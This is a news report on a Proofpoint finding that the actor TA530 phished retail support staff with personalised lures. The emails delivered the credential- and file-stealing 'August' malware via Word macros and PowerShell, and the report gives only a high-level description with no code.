A new malware-ridden phishing campaign has been found targeting retailers’ customer service representatives and managerial staff, researchers warned.
According to cybersecurity firm Proofpoint, the campaign leverages a relatively new malware – dubbed ‘August’ – capable of stealing credentials and sensitive documents from the infected computer.
Researchers explained the attack is carried out via a highly personalized email containing Word macros that could download and install the malware.
“During our analysis, we found that many of the lures and subject lines of the emails used references to issues with supported purchases on the company’s website and were targeted at individuals who may be able to provide support for those issues,” said Proofpoint.
The attackers use subject lines that include the recipient’s domain, such as:
- Erroneous charges from [recipient’s domain]
- [recipient’s domain] – Help: Items vanish from the cart before checkout
- [recipient’s domain] Support: Products disappear from the cart during checkout
- Need help with order on [recipient’s domain]
- Duplicate charges on [recipient’s domain]
Once the malware is installed, researchers determined August is capable of stealing and uploading files with specific extensions to a command and control (C&C) server; grabbing credentials; determining the presence of common security tools; and using simple encryption.
“The malware itself is obfuscated while the macro used in these distribution campaigns employs a number of evasion techniques and a fileless approach to load the malware via PowerShell,” the researchers noted.
“All of these factors increase the difficulty of detection, both at the gateway and the endpoint,” said Proofpoint.
Per their investigation, researchers said the campaign appears to be linked to TA530 – an actor or cybercrime group that they have previously cited for their highly personalized campaigns.
“While this actor is largely targeting retailers and manufacturers with large B2C sales operations, August could be used to steal credentials and files in a wide range of scenarios,” warned Proofpoint.